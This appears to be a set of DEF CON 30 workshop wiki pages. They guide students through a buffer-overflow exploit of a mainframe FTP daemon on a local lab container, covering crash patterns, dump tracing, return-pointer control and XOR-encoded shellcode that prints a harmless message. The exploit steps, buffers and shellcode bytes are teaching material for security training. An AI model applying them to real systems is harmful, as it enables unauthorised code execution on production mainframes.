15 | 16 | * https://dc30.soldieroffortran.org:8443 (The secret is `D3FC0N`) 17 | * `x3270 -noverifycert L:dc30.soldieroffortran.org:2323` 18 | 19 | Once connected logon with your assigned userid (`DC00` through `DC22` the password is the same as your username). This gets you logged on to TSO. 20 | 21 | To change your user id, at the `READY` prompt type `LOGON //`. The limit is 8 characters, alpha/numeric/special. For example to change the password for the user DC00: `LOGON DC00/DC00/D3FC0NPW`. ''Note'' Max length is 8 and only certain special characters are supported. 22 | 23 | !! Run the Hello Program 24 | 25 | ⚠️ ''Note'' ⚠️: Anywhere you see `` replace it with your assigned (or chosen) user id. For example, if my userid is `DC00` then i would substitute `.LOAD` with `DC00.LOAD` 26 | 27 | The program `HELLO` has been installed in `.LOAD`. This is called a Partitioned Dataset (PDS). To run a program in TSO you CALL it: `CALL '.LOAD(HELLO)'`. 28 | 29 | Before you run the program clear the screen with the command `CLS`. 30 | 31 | Now run the hello program replacing `` with your ID: `CALL '.LOAD(HELLO)'` ⚠️''WARNING'' Make sure you include the single quotes. ⚠️ 32 | 33 | 34 | 35 | ''Note:'' You can copy/paste with x3270 but you can only paste in to web3270 36 | 37 | !! ISPF Primer 38 | 39 | To access and edit files you use ISPF. ISPF allows you to browse, create, and edit files. It also allows you to see the output from jobs. 40 | 41 | To access ISPF you use the TSO command `ISPF`. 42 | [img[Screenshot_2022-07-31_11-06-42.png]] 43 | 44 | To access the file browser you use option 3 then option 4. As a shorthand you can do both at the same time by using `.`. So instead of typing `3` followed by enter and `4` followed by enter you type `3.4` and enter. To access the file browser from anywhere in ISPF you can prepend `=`: `=3.4` 45 | 46 | To access job output you use option 3 followed by option 8. Again this can be shortened to `3.8`. 47 | 48 | ISPF also allows for more than one "window". Pressing `F2` on your keyboard will open another screen. You cycle through these screens with `F9`. 49 | 50 | When you get stuck (you will) you can exit the current program/window/screen by pressing `F3`. If your keyboard gets "stuck" (you cannot enter text) simply hit the tab button. If you cannot get un stuck we will help you, don't worry. Everyone will likely get stuck at some point. Don't sweat it. 51 | 52 | !! Access LAB01 JCL 53 | 54 | # From ISPF access the file browser with `=3.4` 55 | # Where it says `Data set name prefix ==>` you will type your userid and hit enter 56 | # In the `S` column move your cursor down to `.JCLLIB`, type the letter `E` and hit enter. [img[image_edit.png]] 57 | # Hit the `TAB` button until your cursor is in front of `LAB01`, type `E` again and hit enter [img[emem.png]] 58 | 59 | This is the ISPF editor. 60 | 61 | [img[editor.png]] 62 | 63 | !! ISPF Editor Primer 64 | 65 | * To exit hit `F3` or type `END` on the `Command ==>` line. ''WARNING'' this will auto save any changes you've made. To not save changes type `CANCEL` on the command line instead 66 | * To insert a line type `I` in the column with the numbers under the six red `*`. To add more than one line add a number. `I30` adds 30 lines. 67 | * To edit lines just write over them. 68 | * To go a page up in the editor you press `F7` 69 | * To page down you press `F8` 70 | * To move left/right press `F10`/`F11` 71 | 72 | !! Edit the job and submit it 73 | 74 | # With `.JCLLIB(LAB01)` opened change line 10, replace `TESTRUN` with your userid and hit enter 75 | # On the `Command ==>` line type `SAVE`, hit enter, then `SUBMIT` and hit enter. Hit enter a few times and you'll eventually get `MAX COND CODE 0000` which means the job was successfully run 76 | 77 | !! Viewing the job output 78 | 79 | # Press `F2` to open a new screen 80 | # On the `OPTION ===>` line type `=3.8` 81 | # On the `Command ===>` line type `ST `. E.G. `ST DC09` 82 | # Move your cursor (with tab or arrow keys) until it is in the `S` column in front of `LAB1` (e.g. `DC09LAB1`) 83 | # Place an `S` in that column in front of the job and hit enter 84 | [img[image.png]] 85 | 86 | 87 | This is the job output. If you scroll to the bottom by pressing `F8` you will see the same output as we did from TSO 88 | 89 | [img[Joblogheader.png]] 90 | 91 | [img[Screenshot_2022-07-31_11-32-55.png]] 92 | 93 | 94 | ! Bonus 95 | 96 | If you've finished this lab early why not check out what are in some of the other partitioned datasets that start with your HLQ. Hitting `F9` to get back to the editor and hitting `F3` twice will take you there. -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 10 - FTP Buffer Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220801161821424 2 | modified: 20220805164759119 3 | tags: 4 | title: Lab 10 - FTP Buffer Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | [img[Screenshot_2022-08-01_09-28-19.png]] 8 | 9 | !!! This lab and all following labs must be done on your local docker image they will ''NOT'' work on the cloud mainframe. We already patched that 😈 10 | 11 | !! Setting up your environment 12 | 13 | In you're workshop VM (if you're using it) we've provided a shell script to make your lives easier: `~/docker.sh` 14 | 15 | Running this does the following: 16 | 17 | * resets the defcon30 container 18 | * Opens up the ports 2323 (tn3270) , 8443 (web, 8888 locally 19 | * Opens ports 2121 through 2141 20 | * Maps the volume `/printers` to `~/dumps` 21 | 22 | Here's how to use those ports/folders: 23 | 24 | * TN3270: `x3270 -noverifycert L:localhost:2323` or pw3270 25 | * Web based 3270: https://localhost:8443 (the secret is `D3FC0N`) 26 | * Hercules Console: http://localhost:8888 (Username/password: `defcon`) 27 | * Lab Wiki: http://localhost:8080 28 | * ftp: `ftp localhost 2121` ⬅️ a range of ports from 2121 to 2141 is available 29 | * `/home/defcon/dumps`: Read the output of `/home/defcon/dumps/prt00e.txt` when you crash FTPD 30 | 31 | If you're not using the VM you can do the same with these docker commands: 32 | 33 | ``` 34 | docker kill defcon30 35 | docker rm defcon30 36 | docker run -d \ 37 | --name=defcon30 \ 38 | -e HUSER=defcon \ 39 | -e HPASS=defcon \ 40 | -p 2323:3223 \ 41 | -p 8888:8888 \ 42 | -p 2121-2141:2121-2141 \ 43 | -p 8443:8443 \ 44 | -p 8080:8080 \ 45 | -p 31337-31347:31337-31347 \ 46 | -v ~/dumps:/printers \ 47 | --restart unless-stopped \ 48 | mainframed767/defcon30:latest 49 | ``` 50 | 51 | 52 | !! Create ASCII de Brujin 53 | 54 | # Using FTP download both rexx scripts in `.EXEC`: 55 | #* `cd .exec` 56 | #* `get DEBRUIJN DEBRUIJN.rexx` 57 | #* `get DECODEI DECODEI.rexx` and exit FTP 58 | #* this is already done for you on the workshop vm in the folder `~/labs`. 59 | # In a linux terminal generate a de Brujin pattern with `rexx ~/labs/DEBRUIJN.rexx 1500` 60 | # Copy it to your copy/paste buffer: `rexx ~/labs/DEBRUIJN.rexx 1500 | xsel --clipboard --input` 61 | 62 | !! Overflow 63 | 64 | Before we get started make sure you've got the hercules console open at http://localhost:8888/ (user/pass: `defcon`) and click on ''System Log''. 65 | 66 | # In a linux terminal connect to the FTP server: `ncat -v localhost 2121` 67 | # Once connected type `USER ` 68 | # You will get no response cause you've crashed the FTP server 69 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C4 U0000` means we've crashed FTPD 70 | #* The console doesn't autoupdate, so you'll need to click on `Auto Refresh` to see these updates. Turn it off again when done. 71 | # You can exit ncat with ctrl-c 72 | 73 | !! Tracing the Dump (heh) 74 | 75 | # Make sure we can read the dump: `sudo chmod 655 ~/dumps/prt00e.txt` 76 | # Copy the dump to `~/dump.txt`: `cp ~/dumps/prt00e.txt ~/dump.txt` 77 | # Open the file in your editor of choice: `kate ~/dump.txt` 78 | # Search for `PSW AT ENTRY TO ABEND 078D0000 000CD948` and take note of the address `000CD948` 79 | #* we need this address but since the addresses start at 0 we'll search for `0CD940` 80 | # Search for `0CD940`. This should give you a line similar to `0CD940 41E02064 58C0D000 90CE2000 18D218CF 18B158A0 C08CD203 D058B000 5820D058` 81 | # 8 bytes in is this instruction: `90CE2000` 82 | # Use DECODEI to decode the instruction from machine code to readable in your linux terminal: `rexx ~/labs/DECODEI.rexx 90CE2000` 83 | #* The output from decoding is: `STM R12,R14,0(R2)` 84 | #* STM is store multiple: http://www.simotime.com/asmins01.htm#STM this means that the machine is using `R2` as the base register 85 | # Search the file for `REGS AT TIME OF ERROR` and notice that R2 is set to `C288F7C2`. 86 | #* We can use http://www.longpelaexpertise.com/toolsCode.php to figure out what that is in ASCII: `Bh7B` 87 | #* `C288F7C2` is way outside of addressable memory, we need to change that to be somewhere in memory our program can read/write. 88 | #* Here's our challenge, we cant just use any hex, whatever we send to the FTP socket gets translated from ASCII to EBCDIC. So we have to find ASCII bytes that will translate to the EBCDIC bytes we need. 89 | #* Using http://www.simotime.com/asc2ebc1.htm we can find those bytes 90 | # Find a location in memory we can use 91 | #* Search `~/dump.txt` for `IBMUSER.CLIST` and take note of the memory address on the far left: [img[clistaddress.png]] 92 | #* The address we'll use is `12C000`: 93 | #** The `12` and the `C0` are easy but we can't have a `00` because that a NULL byte. So we replace that will 12. 94 | #** `C0` is `{` in EBCDIC, which is `7B` in ASCII 95 | # Now we need to create a buffer and replace `Bh7B` with `127B12` 96 | #* This, when sent to FTP, will be translated to `12C012` 97 | #* We need 4 bytes though, so we prepend `80` thus our final hex is `80127B12` 98 | #* Why `80`? 00 Is null so it wouldn't work, and we need something that translates. 99 | 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 11 - 2 Crash 2 Furious.tid: -------------------------------------------------------------------------------- 1 | created: 20220801234259555 2 | modified: 20220805170656775 3 | tags: 4 | title: Lab 11 - 2 Crash 2 Furious 5 | type: text/vnd.tiddlywiki 6 | 7 | 8 | !! Creating the New buffer 9 | 10 | # Run `printf 'user ' > pattern2; rexx ~/labs/DEBRUIJN.rexx 1500 >> pattern2` 11 | # Edit pattern2 with your editor of choice: 12 | #* e.g. `okteta pattern2` on the workshop vm 13 | # Search for (ctrl-f in okteta) our pattern: `Bh7B` 14 | # Replace these four bytes with `80127B12` 15 | # Save your changes 16 | 17 | [img[Screenshot_2022-08-03_16-17-06.png]] 18 | 19 | !! Restarting the FTPD server 20 | 21 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2122` 22 | #* This starts the FTP server on port 2122, since it crashed using port 2121 that port is not longer available 23 | # Submit your edited second buffer: `cat pattern2|ncat -v -w1 localhost 2122` 24 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C4 U0000` means we've crashed FTPD 25 | # Congrats you crashed it, again! 26 | 27 | !! Tracing this second Dump (heh) or Second step same as the first 28 | 29 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 30 | # Open the file in your editor of choice: `kate ~/dump.txt` 31 | #* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 32 | # Search for `PSW AT ENTRY TO ABEND 078D1000 00095CCC` and take note of the address `00095CCC` 33 | #* we need this address but since the addresses start at 0 we'll search for `095CC0` 34 | # Search for `0CD940`. This should give you a line similar to `095CC0 14414780 F0380640 4440F04C 41242001` 35 | # `C` bytes in is this instruction: `41242001` 36 | # Use DECODEI to decode the instruction from machine code to readable in your linux terminal: `rexx ~/labs/DECODEI.rexx 41242001` 37 | #* The output from decoding is: `LA R2,1(R4,R2)` 38 | #* STM is store multiple: http://www.simotime.com/asmins01.htm#LA this means that the machine is going to load the address at (R2 + R4) in to R2 39 | # Search the file for `REGS AT TIME OF ERROR` and notice that R2 is set to `F3C287F4`. (` 3Bg4`) 40 | #* ''Note'' there's now two dumps in the dump log 41 | # As previously `F3C287F4` does not exist as a location in memory, we need another place we can jump to. 42 | # Open pattern2 with your hex editor: `okteta pattern2` 43 | # replace the four bytes at 3Bg4 with: `80124142` 44 | #* This will get converted from ascii to ebcdic to `2012C1C2` 45 | # Save your changes as `pattern3` 46 | 47 | !! Restarting the FTPD server 48 | 49 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2123` 50 | # Submit your edited buffer: `cat pattern3|ncat -v -w1 localhost 2123` 51 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C1 U0000` 52 | # Congrats you crashed it, again, uh, again! 53 | 54 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 12 - Hackers Returns.tid: -------------------------------------------------------------------------------- 1 | created: 20220804053052613 2 | modified: 20220805172321148 3 | tags: 4 | title: Lab 12 - Hackers Returns 5 | type: text/vnd.tiddlywiki 6 | 7 | 8 | !! The machine code 9 | 10 | In the previous lab we caused a crash at memory location `00095CCC` lets look at the rest of the instructions from there: `1F144140 00FF4610 F03C9824 D01C07FE` 11 | 12 | ``` 13 | 1F144140 | SLR R1,R4 14 | 00FF | DC X'00FF' 15 | 4610F03C | BCT R1,60(,R15) 16 | 9824D01C | LM R2,R4,28(R13) 17 | 07FE | BCR B'1111',R14 18 | ``` 19 | !! Finding our Return 20 | 21 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 22 | # Open the file in your editor of choice: `kate ~/dump.txt` 23 | #* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 24 | #* To find our current job we look for `STC 111 FTPDDC30` 25 | # Search the dump file for `REGS AT TIME OF ERROR` and notice that R13 is set to `F5C288F6`. (`5Bh6`) so we replace that with yet another location in memory. 26 | # Open pattern3 in you hex editor: `okteta pattern3` 27 | # Search for `5Bh6` and replace it with `8013203C` 28 | # Save this as pattern4 29 | 30 | !! Restarting the FTPD server 31 | 32 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2124` 33 | # Submit your edited buffer: `cat pattern4|ncat -v -w1 localhost 2124` 34 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C6 U0000` means we've crashed FTPD 35 | # Congrats you crashed it, again! 36 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 37 | # Open the file in your editor of choice: `kate ~/dump.txt` ''Note'': Kate will let you reload the file, no need to keep opening new editors. 38 | # Make sure you're looking at the right dump, search for `STC 112 FTPDDC30` 39 | # Search for `SA 13404C` (which in ASCII is `13203C`) 40 | #* This is where the OS thinks our save area was supposed to be in memory 41 | #* Notice that the address MVS wants to return to, is `RET F8C183F9` (`8Ac9`) 42 | 43 | 44 | ! This means we can finally control the return pointer! 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 13 - Not So Fast There.tid: -------------------------------------------------------------------------------- 1 | created: 20220804150341318 2 | modified: 20220805172838206 3 | tags: 4 | title: Lab 13 - Not So Fast There 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Change the return pointer 8 | 9 | # First we need a location in memory to jump to, so open dump.txt if you closed it `kate ~/dump.txt` 10 | #* Go to the beginning of the most resent dump at the bottom and search for `Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Ae0Af1Af`. You should see this line: 11 | 12 | ``` 13 | 134080 C185F2C1 85F3C185 F4C185F5 C185F6C1 85F7C185 F8C185F9 C185F0C1 86F1C186 *Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Ae0Af1Af* 14 | ``` 15 | !! How do we read/use this line: 16 | 17 | The line starts at memory location `134080`. But to use it we need it to be in ASCII first such that translating it to EBCDIC will give us what we want: 18 | 19 | * `13` --> `13` 20 | * `40` --> `20` 21 | * `80` --> `D8` 22 | 23 | To make life easier we've created a script to do this: 24 | 25 | ``` 26 | python3 ~/labs/e2alookup.py 13 40 80 27 | 13 --> 13 28 | 40 --> 20 29 | 80 --> D8 30 | Final String: 1320D8 31 | ``` 32 | 33 | !! Adding to our Overflow 34 | 35 | # Open pattern4 in you hex editor: `okteta pattern4` 36 | # Search for `8Ac9` and replace it with `801320D8` 37 | # Save this as pattern5 38 | 39 | !! Restarting the FTPD server 40 | 41 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2125` 42 | # Submit your edited second buffer: `cat pattern5|ncat -v -w1 localhost 2125` 43 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C1 U0000` means we've crashed FTPD 44 | # Congrats you crashed it, again! 45 | # We need to restart the FTP server one last time so on the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2126` 46 | 47 | !! We control Return 48 | 49 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 50 | # Open the file in your editor of choice: `kate ~/dump.txt` 51 | #* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 52 | # Take a look at the crash dump, if you look at the PSW you'll see `PSW AT ENTRY TO ABEND 078D0000 00134086` 53 | #* `00134086` is the address where it crashed (6 bytes in from where we told it to jump, this means the jump worked) 54 | #* `SYSTEM = 0C1` means that an attempt has been made to execute an invalid op code. http://faculty.cs.niu.edu/~hutchins/csci640/abend.htm 55 | 56 | Now we just copy/paste our machine code from maybe `DEFCON.OVERFLOW(WTO400)` and we're good right?! LOL no this is mainframes, we've got a bit of work still. 57 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 14 - Sockets and EBCDIC.tid: -------------------------------------------------------------------------------- 1 | created: 20220804203418702 2 | modified: 20220805232038613 3 | tags: 4 | title: Lab 14 - Sockets and EBCDIC 5 | type: text/vnd.tiddlywiki 6 | 7 | Up till now we've had to manually look up the ASCII -> EBCDIC for our memory locations. Well, we'll have the exact same problem with our shell code. Here's the shell code: 8 | 9 | ``` 10 | USING *,R14 11 | DS XL6 12 | COPY LA R1,MSGWTO 13 | SVC 35 14 | SVC 03 15 | MSGWTO DC XL4'000C0000' 16 | DC C'RINGRING' 17 | ``` 18 | 19 | !! Creating the shell code 20 | 21 | # Logon on to the local mainframe (either `x3270 -noverifycert L:localhost:2323` or https://localhost:8443) 22 | # Logon with DC00: `LOGON DC00/DC00` 23 | # Using ISPF submit the job LAB13 from `DC00.JCLLIB`: 24 | #* `=3.4` option/command bar 25 | #* put `DC00.JCLLIB` in `Data set name prefix ==>` 26 | #* Put an `E` in front of `DC00.JCLLIB` 27 | #* Put an `E` in front of `LAB13` 28 | #* On the command bar type `SUBMIT` 29 | 30 | If you look at line 41 you can see that the output of the assembled/linked binary is in `DC00.LOAD(WTOSML)` 31 | 32 | [img[linewtosml.png]] 33 | 34 | !! Download the shell code 35 | 36 | Similar to the previous exploit we need to download the assembled binary from FTP 37 | 38 | # Restart the FTP server: on the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2126` 39 | # FTP and donwload the output: 40 | ## `ftp localhost 2126` 41 | ## `cd DC00.LOAD` 42 | ## `bin` ⬅️ ''important'' 43 | ## `GET WTOSML` 44 | 45 | !! Get the Bytes 46 | 47 | # Open WTOSML with your hex editor, and copy the bytes between `CAFEBABE` (You can skip the leading null bytes `00`) 48 | #* Right click -> Copy as -> Value: `41 10 E0 0E 0A 23 0A 03 00 0C 00 00 D9 C9 D5 C7 D9 C9 D5 C7`. 49 | 50 | [img[newwtosml.png]] 51 | 52 | We now have the shell code we're going to use, except there are still Null bytes (`00`) and other bytes that won't convert cleanly 53 | 54 | !! XOR EBCDIC 55 | 56 | # What if we had some bytes that we XOR'd our shell code with? Well, lucky for you we wrote a python script `findbytes.py` to do that for you. 57 | #* Run `python3 ~/labs/findbytes.py 41 10 E0 0E 0A 23 0A 03 00 0C 00 00 D9 C9 D5 C7 D9 C9 D5 C7` which outputs: `Shellcode: D889799793BA939A9995999940504C5E40504C5E XOR Key : 9999999999999999999999999999999999999999` 58 | 59 | 60 | # Or using cyberchef, we XOR the bytes and get: `D889799793BA939A9995999940504C5E40504C5E` ([[Link to the recipe if you're interested|https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'9999999999999999999999999999999999999999'%7D,'Standard',false)To_Hex('None',0)To_Upper_case('All')&input=NDExMEUwMEUwQTIzMEEwMzAwMEMwMDAwRDlDOUQ1QzdEOUM5RDVDNw]]) 61 | # ''Problem'' We've XOR'd our shell code, but we need a way to un XOR it on the mainframe. Luckily Jake wrote the assembly to do just that. 62 | # Open the file `DC00.JCLLIB(LAB14)` (just like we did above) 63 | # Replace `` with `D889799793BA939A9995999940504C5E40504C5E` 64 | # Replace `` with `9999999999999999999999999999999999999999` 65 | # On the command bar type `SUBMIT` to submit the job 66 | 67 | [img[exploitxor.png]] 68 | 69 | !! Download The Final Form 70 | 71 | Our shell code is ready and waiting in `DC00.LOAD(WTOSMLX)`. 72 | 73 | # Download the shell code with FTP (as described above, make sure you use ''binary'' download `bin`): `GET WTOSMLX` 74 | # Open this file with your hex editor `okteta WTOSMLX` 75 | # Notice our shell code is between `CAFEBABE`: `D7 14 E0 06 E0 1A D8 89 79 97 93 BA 93 9A 99 95 99 99 40 50 4C 5E 40 50 4C 5E 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99` [img[exploitshell.png]] 76 | #* This is what we need it to look like after it gets translated by from ASCII to EBCDIC by the socket, so we need to convert each byte to ASCII first. 77 | # Instead of doing it by hand, we have a included a python script in the workshop VM: `python3 ~/labs/e2alookup.py D7 14 E0 06 E0 1A D8 89 79 97 93 BA 93 9A 99 95 99 99 40 50 4C 5E 40 50 4C 5E 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99`: 78 | 79 | ``` 80 | D7 --> 50 81 | 14 --> 9D 82 | E0 --> 5C 83 | 06 --> 86 84 | E0 --> 5C 85 | 1A --> 92 86 | D8 --> 51 87 | 89 --> 69 88 | 79 --> 60 89 | 97 --> 70 90 | 93 --> 6C 91 | BA --> DD 92 | 93 --> 6C 93 | 9A --> AA 94 | 99 --> 72 95 | 95 --> 6E 96 | 99 --> 72 97 | 99 --> 72 98 | 40 --> 20 99 | 50 --> 26 100 | 4C --> 3C 101 | 5E --> 3B 102 | 40 --> 20 103 | 50 --> 26 104 | 4C --> 3C 105 | 5E --> 3B 106 | 99 --> 72 107 | 99 --> 72 108 | 99 --> 72 109 | 99 --> 72 110 | 99 --> 72 111 | 99 --> 72 112 | 99 --> 72 113 | 99 --> 72 114 | 99 --> 72 115 | 99 --> 72 116 | 99 --> 72 117 | 99 --> 72 118 | 99 --> 72 119 | 99 --> 72 120 | 99 --> 72 121 | 99 --> 72 122 | 99 --> 72 123 | 99 --> 72 124 | 99 --> 72 125 | 99 --> 72 126 | Final String: 509D5C865C92516960706CDD6CAA726E727220263C3B20263C3B7272727272727272727272727272727272727272 127 | Writting bytes to shellcode.bin 128 | ``` 129 | 130 | Notice the last line, it also writes these bytes to `shellcode.bin`. 131 | 132 | 133 | 134 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 15 - RCE.tid: -------------------------------------------------------------------------------- 1 | created: 20220804223858219 2 | modified: 20220805232014850 3 | tags: 4 | title: Lab 15 - RCE 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Copying Bytes 8 | 9 | # The last lab created the file `shellcode.bin`, open that file with your hex editor: `okteta shellcode.bin` 10 | # Select all the bytes in the file, and copy them 11 | # Open the pattern file `pattern5` with your hex editor: `okteta pattern5` 12 | # In pattern5 search for `Ae2A` (offset `80`). Replace it (and the other bytes) with the bytes you copied from shellcode.bin 13 | # Save this file as `pattern6` 14 | 15 | It should look like this: 16 | 17 | [img[rceoverflow.png]] 18 | 19 | !! Exploit! 20 | 21 | Your FTP server is still be running on port 2126, we need to reset it. 22 | 23 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) send `/stop ftpddc30` 24 | # Then `/start ftpddc30,srvport=2126` 25 | 26 | # Exploit: `cat pattern6 | ncat -v -w1 localhost 2126` 27 | 28 | If you look now at the output from the master console you can see our code executed (you may need to turn on the Auto Refresh) 29 | 30 | ``` 31 | / +FTP00GI Connection from 172.17.0.1 - 17.53.27 2022/08/05 32 | / +RINGRING 33 | / IEF404I FTPDDC30 - ENDED - TIME=17.53.27 34 | / $HASP395 FTPDDC30 ENDED 35 | ``` 36 | 37 | Or from the job log 38 | 39 | [img[joblog.png]] 40 | 41 | Congrats! You've done a mainframe RCE! You're part of a small handful of people in the world who could do this! 42 | 43 | 44 | [img[youdidit.jpg]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 2 - First Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220731183824487 2 | modified: 20220805065443779 3 | tags: 4 | title: Lab 2 - First Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | Lets take a look at the first buffer overflow 8 | 9 | # In ISPF edit the file `.OVERFLOW(LGBT400)` 10 | #* In the `Command ===>` line type `=3.4` 11 | #* Then fill in `Data set name prefix ==>` with your username [img[dataset user.png]] 12 | #* Tab or arrow key until your cursor is in front of `.OVERFLOW` and put `V` [img[putv.png]] 13 | #* then put a `V` again in front of `LGBT400` and hit enter 14 | # On the `Command ===>` line type `HEX ON` 15 | 16 | This enables the hex editor: 17 | [img[Screenshot_2022-07-31_11-40-25.png]] 18 | 19 | Each byte now has its hex value underneath, vertically. LGBT in EBCDIC is `D3 C7 C2 E3` 20 | 21 | Pressing `F11` to scroll to the right you'll notice this line is 400 columns wide. 22 | 23 | !! Overflowing the HELLO buffer 24 | 25 | # Edit `.JCLLIB(LAB02)` (Hit `F3` twice, then move your cursor to `.JCLLIB`, but `E` then put another `E` in front of `LAB02`. This is the last time i'm reminding you how to open a file. ) 26 | #* To turn off the hex editor type `HEX OFF` and hit enter. 27 | #* Notice that `SYSUDUMP` output is set to `DC00.DUMP001` 28 | #* Also notice our input `STDIN` is the other file we just looked at 29 | # After looking at the job, submit the job with `SUBMIT` in the command lin 30 | # This job will fail with `ABENDED SYSTEM 0C6` 31 | 32 | !! Reviewing the Dump (heh) 33 | 34 | # When a job fails is creates a dump, we can open that file. 35 | # Open the output from the dump in `.DUMP001` (same as before, `F3` twice then `E` in front of the dataset) 36 | # Search for LGBT in hex with `F D3C7C2E3` on the command line (RG means register) 37 | # Jump to line 4546 `L 4546`, this is memory, see all the LGBT in hex. 38 | # Note down which memory address our `LGBT` starts at (this is the column after the line numbers, in hex) 39 | [img[lgtbmemory.png]] 40 | (hint its `0B40AC`) 41 | 42 | Image showing register being overwritten: 43 | [img[Screenshot_2022-07-31_11-50-09.png]] 44 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 3 - Find our return address.tid: -------------------------------------------------------------------------------- 1 | created: 20220731185039915 2 | modified: 20220805065719567 3 | tags: 4 | title: Lab 3 - Find our return address 5 | type: text/vnd.tiddlywiki 6 | 7 | Somewhere in the 400 bytes we overflows we overwrote the return address. Now we need to find it. 8 | 9 | # Edit `.OVERFLOW(LOC400)`, notice its alpha/numeric every 4 bytes. 10 | # Edit `.JCLLIB(LAB03)` and submit the job by typing `SUBMIT` in the command line. This job will fail with `ABENDED SYSTEM 0C4` 11 | # Edit the dump `.DUMP002`. Notice on line 3 we can see the PSW `0PSW AT ENTRY TO ABEND 078D0000 007C7C7C` which means the CPU tried to execute instruction at memory location `7C 7C 7C`. 12 | # Jump to line 384 `L 384` and notice the RETurn value was ` RET 7C7C7C7C`. `7C` in ebcdic is the character `@`. 13 | # ''We can now control the return address!!'' 14 | 15 | [img[Screenshot_2022-07-31_12-00-00.png]] 16 | 17 | Going back to `LOC400` we need to find where the character @ repeated 4 times? -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 4 - Exploit!.tid: -------------------------------------------------------------------------------- 1 | created: 20220731185926293 2 | modified: 20220805065919404 3 | tags: 4 | title: Lab 4 - Exploit! 5 | type: text/vnd.tiddlywiki 6 | 7 | Now that we know where in our buffer we can control the return, we can now overflow the buffer and control execution. 8 | 9 | # Edit `.OVERFLOW(WTO400)` Scroll to the right with `F11` and see now that the `@@@@` have been replaced with something (around `Columns 257 328`). 10 | #* Turn on the hex editor with `HEX ON` so see what it is. 11 | #* This address should be similar to the memory location we noted down in Lab 2. 12 | #* ''Bonus question'': Why isn't it the same as the location that LGBT starts in memory from Lab 2? 13 | # Edit `.JCLLIB(LAB04)`. and submit the job. It should end with `MAX COND CODE 0000` 14 | # View the job output (type `=3.8` on the command bar and `ST ` to show only your jobs. 15 | #* Notice in the job log we see ` +H4CK3D TH3 M41NFR4M3`. This is a Write To Operator (WTO) message that we executed with our overflow! 16 | 17 | 18 | If you want to see what we changed, download both `.OVERFLOW(LOC400)` and `.OVERFLOW(WTO400)` with FTP in binary mode (FTP is listening on port 2121) and use the linux command `vbindiff` to compare them. Vbindiff can show EBCDIC by pressing `C` 19 | 20 | [img[Screenshot_2022-07-31_12-05-20.png]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 5 - OPENTST.tid: -------------------------------------------------------------------------------- 1 | created: 20220731215614196 2 | modified: 20220805070618632 3 | tags: 4 | title: Lab 5 - OPENTST 5 | type: text/vnd.tiddlywiki 6 | 7 | Open test is a simple ASM program assembled, linked and placed in `SYSC.LINKLIB(OPENTST)`. It has been placed in an APF authorized dataset but cannot run authorized code because AC is set to `00`. 8 | 9 | [img[Screenshot_2022-07-31_14-59-18.png]] 10 | 11 | Here's the source from https://github.com/jake-mainframe/ARBAUTH/blob/master/arbauth.jcl 12 | 13 | ``` 14 | OPENTST CSECT 15 | *********************************************************************** 16 | * INITIALIZATION 17 | *********************************************************************** 18 | BALR R12,0 19 | USING *,R12 20 | STM R14,R12,SAVE 21 | OPEN (INDCB,(INPUT)) 22 | *********************************************************************** 23 | * MAINSTREAM OF PROGRAM 24 | *********************************************************************** 25 | GET INDCB,INAREA 26 | SAYHI LA R1,MSGHI 27 | SVC 35 28 | *********************************************************************** 29 | * END OF PROGRAM 30 | *********************************************************************** 31 | ENDPROG LM R14,R12,SAVE 32 | XR R15,R15 33 | BR R14 34 | *********************************************************************** 35 | * DATA 36 | 